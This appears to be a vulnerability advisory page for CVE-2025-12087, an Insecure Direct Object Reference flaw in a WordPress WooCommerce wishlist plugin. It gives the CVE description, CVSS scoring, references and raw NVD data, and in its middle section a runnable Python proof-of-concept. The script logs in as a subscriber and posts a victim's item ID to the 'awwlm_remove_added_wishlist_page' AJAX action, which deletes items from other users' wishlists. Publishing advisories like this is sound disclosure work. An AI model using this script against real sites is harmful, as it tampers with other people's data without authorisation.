CVE-2025-12087

Description

The Wishlist and Save for later for Woocommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.22 via the 'awwlm_remove_added_wishlist_page' AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete wishlist items from other user's wishlists.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Wishlist and Save for later for WooCommerce插件 <= 1.1.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12087 PoC - IDOR in Wishlist and Save for later for WooCommerce plugin
# Target: WordPress site with vulnerable WooCommerce wishlist plugin <= 1.1.22

def exploit_idor(target_url, wp_admin_user, wp_admin_pass, victim_wishlist_item_id):
    """
    Exploits CVE-2025-12087 by removing items from other users' wishlists
    
    Args:
        target_url: Target WordPress site URL
        wp_admin_user: WordPress subscriber+ account username
        wp_admin_pass: Account password
        victim_wishlist_item_id: ID of wishlist item to delete from victim account
    """
    session = requests.Session()
    
    # Step 1: Authenticate to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': wp_admin_user,
        'pwd': wp_admin_pass,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    session.post(login_url, data=login_data)
    
    # Step 2: Get WordPress nonce for AJAX requests
    nonce_url = f"{target_url}/wp-admin/admin-ajax.php?action=awwlm_get_nonce"
    response = session.get(nonce_url)
    
    # Step 3: Exploit IDOR - Delete victim user's wishlist item
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'awwlm_remove_added_wishlist_page',
        'wishlist_id': victim_wishlist_item_id,  # Attacker-controlled, no ownership validation
        'security': response.text.strip()
    }
    
    result = session.post(ajax_url, data=exploit_data)
    
    if result.status_code == 200 and 'removed' in result.text.lower():
        print(f"[+] Successfully deleted wishlist item {victim_wishlist_item_id}")
        return True
    else:
        print("[-] Exploitation failed")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_12087_poc.py <url> <user> <pass> <item_id>")
        sys.exit(1)
    exploit_idor(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12087
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12087
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12087/
[4] VulDB https://vuldb.com/cve/CVE-2025-12087
[5] https://plugins.trac.wordpress.org/log/aco-wishlist-for-woocommerce/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/17e8a743-7985-4b28-b854-ac052a834f3a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12087", "sourceIdentifier": "[email protected]", "published": "2025-11-12T05:15:39.020", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Wishlist and Save for later for Woocommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.22 via the 'awwlm_remove_added_wishlist_page' AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete wishlist items from other user's wishlists."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/log/aco-wishlist-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/17e8a743-7985-4b28-b854-ac052a834f3a?source=cve", "source": "[email protected]"}]}}